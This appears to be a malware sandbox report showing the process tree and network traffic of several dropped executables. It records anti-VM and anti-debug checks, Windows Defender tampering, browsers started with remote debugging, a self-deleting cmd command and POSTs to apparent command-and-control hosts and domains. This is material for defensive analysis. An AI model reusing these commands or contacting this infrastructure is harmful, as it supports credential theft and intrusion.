        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4640,i,16552900340899272963,9888945694181116105,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4684 /prefetch:8
        7⤵
        
        PID:2992
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5100,i,16552900340899272963,9888945694181116105,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4996 /prefetch:8
        7⤵
        
        PID:2976
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4756,i,16552900340899272963,9888945694181116105,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4812 /prefetch:8
        7⤵
        
        PID:3852
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5036,i,16552900340899272963,9888945694181116105,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4772 /prefetch:8
        7⤵
        
        PID:2656
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4684,i,16552900340899272963,9888945694181116105,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5028 /prefetch:8
        7⤵
        
        PID:3020
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=4948,i,16552900340899272963,9888945694181116105,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4692 /prefetch:2
        7⤵
        Uses browser remote debugging
        
        PID:5696
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory="Default"
        6⤵
        Uses browser remote debugging
        Enumerates system info in registry
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        Suspicious use of FindShellTrayWindow
        
        PID:5344
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ffb253046f8,0x7ffb25304708,0x7ffb25304718
        7⤵
        Checks processor information in registry
        Enumerates system info in registry
        Suspicious behavior: EnumeratesProcesses
        
        PID:5328
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1956,6205012926801280535,4941040937276749819,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2000 /prefetch:2
        7⤵
        
        PID:2680
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1956,6205012926801280535,4941040937276749819,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2220 /prefetch:3
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:392
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1956,6205012926801280535,4941040937276749819,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2528 /prefetch:2
        7⤵
        
        PID:1352
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1956,6205012926801280535,4941040937276749819,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2708 /prefetch:8
        7⤵
        
        PID:2660
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1956,6205012926801280535,4941040937276749819,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2424 /prefetch:2
        7⤵
        
        PID:1396
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=1956,6205012926801280535,4941040937276749819,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3536 /prefetch:1
        7⤵
        Uses browser remote debugging
        
        PID:5512
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=1956,6205012926801280535,4941040937276749819,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3552 /prefetch:1
        7⤵
        Uses browser remote debugging
        
        PID:5516
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1956,6205012926801280535,4941040937276749819,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3824 /prefetch:2
        7⤵
        
        PID:5540
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1956,6205012926801280535,4941040937276749819,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3828 /prefetch:2
        7⤵
        
        PID:5644
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1956,6205012926801280535,4941040937276749819,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3220 /prefetch:2
        7⤵
        
        PID:2520
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1956,6205012926801280535,4941040937276749819,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=3220 /prefetch:2
        7⤵
        
        PID:5720
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1956,6205012926801280535,4941040937276749819,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=2640 /prefetch:2
        7⤵
        
        PID:5736
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1956,6205012926801280535,4941040937276749819,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=2616 /prefetch:2
        7⤵
        
        PID:5756
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5084 -s 2112
        6⤵
        Program crash
        
        PID:1484
    - - C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
        
        "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
        5⤵
        
        PID:4384
    - - C:\Users\Admin\AppData\Local\Temp\1005497001\f69e93f11b.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1005497001\f69e93f11b.exe"
        5⤵
        Modifies Windows Defender Real-time Protection settings
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Windows security modification
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5008
- - C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2n6965.exe
    C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2n6965.exe
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:2044
- C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3f60z.exe
  C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3f60z.exe
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Checks computer location settings
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Loads dropped DLL
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  - Checks processor information in registry
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:3920
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3f60z.exe" & del "C:\ProgramData\*.dll"" & exit
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1524
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 5
      4⤵
      System Location Discovery: System Language Discovery
      Delays execution with timeout.exe
      PID:3468

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:3952

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:2932

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 5084 -ip 5084
1⤵
PID:1516

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:1400

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:5128

Network

DNS

8.8.8.8.in-addr.arpa

Remote address:

8.8.8.8:53

Request

8.8.8.8.in-addr.arpa

IN PTR

Response

8.8.8.8.in-addr.arpa

IN PTR

dnsgoogle
DNS

58.55.71.13.in-addr.arpa

Remote address:

8.8.8.8:53

Request

58.55.71.13.in-addr.arpa

IN PTR

Response
DNS

172.214.232.199.in-addr.arpa

Remote address:

8.8.8.8:53

Request

172.214.232.199.in-addr.arpa

IN PTR

Response
DNS

67.31.126.40.in-addr.arpa

Remote address:

8.8.8.8:53

Request

67.31.126.40.in-addr.arpa

IN PTR

Response
DNS

95.221.229.192.in-addr.arpa

Remote address:

8.8.8.8:53

Request

95.221.229.192.in-addr.arpa

IN PTR

Response
DNS

presticitpo.store

c3a87ab7a9.exe

Remote address:

8.8.8.8:53

Request

presticitpo.store

IN A

Response
DNS

crisiwarny.store

c3a87ab7a9.exe

Remote address:

8.8.8.8:53

Request

crisiwarny.store

IN A

Response
DNS

fadehairucw.store

c3a87ab7a9.exe

Remote address:

8.8.8.8:53

Request

fadehairucw.store

IN A

Response
DNS

thumbystriw.store

c3a87ab7a9.exe

Remote address:

8.8.8.8:53

Request

thumbystriw.store

IN A

Response
DNS

necklacedmny.store

c3a87ab7a9.exe

Remote address:

8.8.8.8:53

Request

necklacedmny.store

IN A

Response
DNS

founpiuer.store

c3a87ab7a9.exe

Remote address:

8.8.8.8:53

Request

founpiuer.store

IN A

Response
DNS

navygenerayk.store

c3a87ab7a9.exe

Remote address:

8.8.8.8:53

Request

navygenerayk.store

IN A

Response

navygenerayk.store

IN A

104.21.56.225

navygenerayk.store

IN A

172.67.156.62
POST

https://navygenerayk.store/api

2n6965.exe

Remote address:

104.21.56.225:443

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: navygenerayk.store

Response

HTTP/1.1 200 OK

Date: Mon, 11 Nov 2024 08:40:33 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=m6fvkf7a98bgekq64n6na9tmr7; expires=Fri, 07-Mar-2025 02:27:12 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4g%2Bx8VT6Tzn6RqXQ609rw6FZZ0Kdp6jXuqUkbigM7qTER4vtHPZk7X3njUxF9jedG1xVM%2FS%2FY3WdpwuoQT6HCu9DL0wRomLER3iVJfkprYQ8qDth2B1jr6f9jGk%2FAqj7KypMrFo%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e0cfa689bc26408-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=45421&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3303&recv_bytes=609&delivery_rate=85987&cwnd=243&unsent_bytes=0&cid=54e34a65d5a5057d&ts=290&x=0"
DNS

scriptyprefej.store

c3a87ab7a9.exe

Remote address:

8.8.8.8:53

Request

scriptyprefej.store

IN A

Response
DNS

steamcommunity.com

c3a87ab7a9.exe

Remote address:

8.8.8.8:53

Request

steamcommunity.com

IN A

Response

steamcommunity.com

IN A

104.82.234.109
GET

https://steamcommunity.com/profiles/76561199724331900

2n6965.exe

Remote address:

104.82.234.109:443

Request

GET /profiles/76561199724331900 HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Host: steamcommunity.com

Response

HTTP/1.1 200 OK

Server: nginx
Content-Type: text/html; charset=UTF-8
Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache
Date: Mon, 11 Nov 2024 08:40:34 GMT
Content-Length: 36020
Connection: keep-alive
Set-Cookie: sessionid=1e70c1d9a09c8da2da24f938; Path=/; Secure; SameSite=None
Set-Cookie: steamCountry=GB%7Ce15d564837abb028acb4e114150d704d; Path=/; Secure; HttpOnly; SameSite=None
DNS

marshal-zhukov.com

c3a87ab7a9.exe

Remote address:

8.8.8.8:53

Request

marshal-zhukov.com

IN A

Response

marshal-zhukov.com

IN A

104.21.82.174

marshal-zhukov.com

IN A

172.67.160.80
POST

https://marshal-zhukov.com/api

2n6965.exe

Remote address:

104.21.82.174:443

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: marshal-zhukov.com

Response

HTTP/1.1 200 OK

Date: Mon, 11 Nov 2024 08:40:34 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=k35updvb9920ij424rqa2mf6c8; expires=Fri, 07-Mar-2025 02:27:13 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Gn3iuQnAPR9q%2Fu30B9gslpcZC8v8plZb%2F8E3pQo62CciYNELkd67zfR5wq0Qz8%2F74Nh0iOxhiAOvFyjc%2B%2BAAjzTsN5FJYLNFrDUm8FsenbN7QWYCI3q8Z6OCCYA98ZZUW6vaV1c%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e0cfa6eaec2948c-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=42239&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3306&recv_bytes=609&delivery_rate=89620&cwnd=253&unsent_bytes=0&cid=bad24b187ccf5cad&ts=193&x=0"
POST

http://185.215.113.43/Zu7JuNko/index.php

skotes.exe

Remote address:

185.215.113.43:80

Request

POST /Zu7JuNko/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.43
Content-Length: 4
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 11 Nov 2024 08:40:34 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Refresh: 0; url = Login.php
POST

http://185.215.113.43/Zu7JuNko/index.php

skotes.exe

Remote address:

185.215.113.43:80

Request

POST /Zu7JuNko/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.43
Content-Length: 158
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 11 Nov 2024 08:40:35 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://185.215.113.43/Zu7JuNko/index.php

skotes.exe

Remote address:

185.215.113.43:80

Request

POST /Zu7JuNko/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.43
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 11 Nov 2024 08:40:40 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://185.215.113.43/Zu7JuNko/index.php

skotes.exe

Remote address:

185.215.113.43:80

Request

POST /Zu7JuNko/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.43
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 11 Nov 2024 08:40:43 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://185.215.113.43/Zu7JuNko/index.php

skotes.exe

Remote address:

185.215.113.43:80

Request

POST /Zu7JuNko/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.43
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 11 Nov 2024 08:40:45 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://185.215.113.43/Zu7JuNko/index.php

skotes.exe

Remote address:

185.215.113.43:80

Request

POST /Zu7JuNko/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.43
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 11 Nov 2024 08:40:50 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
DNS

225.56.21.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

225.56.21.104.in-addr.arpa

IN PTR

Response
DNS

109.234.82.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

109.234.82.104.in-addr.arpa

IN PTR

Response

109.234.82.104.in-addr.arpa

IN PTR

a104-82-234-109deploystaticakamaitechnologiescom
GET

http://185.215.113.206/

3f60z.exe

Remote address:

185.215.113.206:80

Request

GET / HTTP/1.1
Host: 185.215.113.206
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Mon, 11 Nov 2024 08:40:35 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
POST

http://185.215.113.206/6c4adf523b719729.php

3f60z.exe

Remote address:

185.215.113.206:80

Request

POST /6c4adf523b719729.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----JKJEHJKJEBGHJJKEBGIE
Host: 185.215.113.206
Content-Length: 211
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 404 Not Found

Date: Mon, 11 Nov 2024 08:40:35 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 277
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
POST

http://185.215.113.206/6c4adf523b719729.php

3f60z.exe

Remote address:

185.215.113.206:80

Request

POST /6c4adf523b719729.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----BKFHCGIDBAAFHIDHDAAE
Host: 185.215.113.206
Content-Length: 473
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 404 Not Found

Date: Mon, 11 Nov 2024 08:40:35 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 277
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
POST

http://185.215.113.206/6c4adf523b719729.php

3f60z.exe

Remote address:

185.215.113.206:80

Request

POST /6c4adf523b719729.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----FIEGCBKEGCFCBFIDBFII
Host: 185.215.113.206
Content-Length: 472
